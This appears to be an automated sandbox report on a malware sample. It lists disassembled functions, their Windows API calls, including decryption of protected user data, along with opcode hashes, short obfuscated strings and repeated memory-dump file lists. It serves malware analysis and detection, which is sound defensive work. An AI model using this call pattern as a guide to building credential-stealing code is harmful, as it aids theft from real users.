                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 8kq$q9;w$q9;w$'O?
                                  • API String ID: 0-703812808
                                  • Opcode ID: 2577eeef80bc6eb48b966c1536f49d1f8cca7e47bce5275166192b29ae9d40df
                                  • Instruction ID: e6ba14903a8932250a00454e3a1a1e299cf4ccf1bbffe19fb1a31dd11d8d7fdc
                                  • Opcode Fuzzy Hash: 2577eeef80bc6eb48b966c1536f49d1f8cca7e47bce5275166192b29ae9d40df
                                  • Instruction Fuzzy Hash: E9B2E6F3A0C2009FE304AE29EC8567AFBE9EF94720F16893DE6C5C7744E63558058697
                                  Function 00728EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00715184,40000001,00000000,00000000,?,00715184), ref: 00728EC0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 00216c6f8a5b45d057c3a07eac7c0d54c8195071e5faabd734f167a4f16e7424
                                  • Instruction ID: 2c64f90d63a724877295ff0a94108fa37f0c91a564ab5d4ec55c361f636c6321
                                  • Opcode Fuzzy Hash: 00216c6f8a5b45d057c3a07eac7c0d54c8195071e5faabd734f167a4f16e7424
                                  • Instruction Fuzzy Hash: F4110670205208BFDB40CF65EC84FAA37A9AF89301F109548F9198B250DB3AE941EB66
                                  Function 00727A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0122EEF0,00000000,?,00730E10,00000000,?,00000000,00000000), ref: 00727A63
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00727A6A
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0122EEF0,00000000,?,00730E10,00000000,?,00000000,00000000,?), ref: 00727A7D
                                  • wsprintfA.USER32 ref: 00727AB7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: 7afe59ef376004a0eb1a3aefa9a5fb7de1446d2b59c4d53ae200a4c915c2bc3f
                                  • Instruction ID: 4392913b27f7e1771d02a347912263c4a32d91d04606a91b71574cdc732f2beb
                                  • Opcode Fuzzy Hash: 7afe59ef376004a0eb1a3aefa9a5fb7de1446d2b59c4d53ae200a4c915c2bc3f
                                  • Instruction Fuzzy Hash: 2911A5B1949228EBEB24CF55DD55F59B778F704721F104399E606932C0C7781E40CF55
                                  Function 00AD8375 Relevance: 5.5, Strings: 3, Instructions: 1705COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "p`+$_8=?$+{n
                                  • API String ID: 0-1499603292
                                  • Opcode ID: 1ea4b0d663f173d18901982b09ce911ba462157ddeafe775fb00ab7f7ae4d63e
                                  • Instruction ID: 017c0883eeddd193f8802c9c0180995549a383b42aaf604989e82c0e564f51aa
                                  • Opcode Fuzzy Hash: 1ea4b0d663f173d18901982b09ce911ba462157ddeafe775fb00ab7f7ae4d63e
                                  • Instruction Fuzzy Hash: 9DB2F8F360C204AFE304AE29EC8567AFBE9EF94720F16493DE6C5C3744E63598058697
                                  Function 00723720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoCreateInstance.COMBASE(0072E118,00000000,00000001,0072E108,00000000), ref: 00723758
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 007237B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: c3a16e7ea2cf8d277b10b3d9a32695581808f2e2fe86ddd373222c013e8b4fe8
                                  • Instruction ID: b96e58e607dc034638451ba925eb4b00276ee92261bfb6201f463ad3023d3d0b
                                  • Opcode Fuzzy Hash: c3a16e7ea2cf8d277b10b3d9a32695581808f2e2fe86ddd373222c013e8b4fe8
                                  • Instruction Fuzzy Hash: E1410971A00A2C9FDB24DB58DC98B9BB7B4BB48702F4041D8E608EB2D0E7756E85CF50
                                  Function 00719B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00719B84
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00719BA3
                                  • LocalFree.KERNEL32(?), ref: 00719BD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: 35874eb2c8707008a4a9e6f4f088b567e24074bab2498159da50c8c967064e20
                                  • Instruction ID: a8ca23242783083908b862b3ec4367ffd5ac77d74899d726b57a7764e0275971
                                  • Opcode Fuzzy Hash: 35874eb2c8707008a4a9e6f4f088b567e24074bab2498159da50c8c967064e20
                                  • Instruction Fuzzy Hash: 211109B8A00209EFDB04DF98D985AAEB7B5FF88300F104598E915A7390D774AE50CFA1
                                  Function 00ADF4B3 Relevance: 3.7, Strings: 2, Instructions: 1153COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 5az$~=U
                                  • API String ID: 0-1614349201
                                  • Opcode ID: b159e509e1c76b249112d467839c1641ad2ce28f146bf57be94d4ecc129aa307
                                  • Instruction ID: f08d5834feeabb76b8627edb572757dc6eafdbf7f4fcab6a9fab7706e08cbdb3
                                  • Opcode Fuzzy Hash: b159e509e1c76b249112d467839c1641ad2ce28f146bf57be94d4ecc129aa307
                                  • Instruction Fuzzy Hash: FD7206F36082049FE7046E2DEC8567AFBE5EF94720F1A4A3DEAC4C7744E63598018697
                                  Function 00ACE86D Relevance: 3.6, Strings: 2, Instructions: 1079COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ^&{$*uy
                                  • API String ID: 0-1729172677
                                  • Opcode ID: c7497533c54c6c213fb8874a0beb18aa4f58ed4da48fd996f046343d1fd1204f
                                  • Instruction ID: fca9c67a284c0469f07e5412769c27fb493daf2c858ad7ba363e6b1a643119e9
                                  • Opcode Fuzzy Hash: c7497533c54c6c213fb8874a0beb18aa4f58ed4da48fd996f046343d1fd1204f
                                  • Instruction Fuzzy Hash: 7D72C4F260C2009FE318AF29DC8567AF7E5EF94720F16893DE6C983744EA3598418797
                                  Function 00AE16A0 Relevance: 3.0, Strings: 2, Instructions: 472COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: (1{$wv4
                                  • API String ID: 0-3130603804
                                  • Opcode ID: cf8aef5c9e50742dde64be6569727149ac1a5f8ad601bd56cdf9db74afd88414
                                  • Instruction ID: 9aa8ca337110a0505bcc1733f54ee9e973aa09510b7eed691949884b603309d0
                                  • Opcode Fuzzy Hash: cf8aef5c9e50742dde64be6569727149ac1a5f8ad601bd56cdf9db74afd88414
                                  • Instruction Fuzzy Hash: 7EE1D9F3A09200AFD3046E59EC85BABFBEAEFD4720F16853DE6D483740E6355805C696
                                  Function 00AE2404 Relevance: 2.8, Strings: 1, Instructions: 1584COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 9-
                                  • API String ID: 0-3406688628
                                  • Opcode ID: 6ac7bed55eb65b66cf7bbb4798d91569f5b54d23781aa4c71b33c8533d6066ac
                                  • Instruction ID: 56a1d9272afbedb955bd3982ed023d766501019aa110988bcd8da7e9f26aa1be
                                  • Opcode Fuzzy Hash: 6ac7bed55eb65b66cf7bbb4798d91569f5b54d23781aa4c71b33c8533d6066ac
                                  • Instruction Fuzzy Hash: 35B204F360C2049FE304AE29EC8567AFBE5EF94320F1A893DEAC4C7744E63558458697
                                  Function 00A8B2E1 Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ps$s_S}
                                  • API String ID: 0-2344491840
                                  • Opcode ID: 6f6e7c0f92c8864259282a680ed94eb0c1cc4a9c584de48d0cb262bcf7b730fa
                                  • Instruction ID: 477992c0110e3c9b2348ab349ca136901e2088d7ca9168d59f000231769eb303
                                  • Opcode Fuzzy Hash: 6f6e7c0f92c8864259282a680ed94eb0c1cc4a9c584de48d0cb262bcf7b730fa
                                  • Instruction Fuzzy Hash: 737114F3A082005FE3049D29DCD5B6BB7DAEFD4320F2A453DDB89D7780E93958058696
                                  Function 00ADA05D Relevance: 2.7, Strings: 1, Instructions: 1484COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: <'~{
                                  • API String ID: 0-3503305900
                                  • Opcode ID: f8900009e52dea328485c92dd90b79ee22fcfab116b498806a6e6d20c32ac799
                                  • Instruction ID: b3f06ff2011cd115ad50391a069dd049b100827d406871e7001687b936114889
                                  • Opcode Fuzzy Hash: f8900009e52dea328485c92dd90b79ee22fcfab116b498806a6e6d20c32ac799
                                  • Instruction Fuzzy Hash: D0A2E4F360C6049FE3046E2DEC8567AFBE9EF94320F16492DEAC4C7744EA3598058697
                                  Function 00A508ED Relevance: 2.7, Strings: 2, Instructions: 224COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
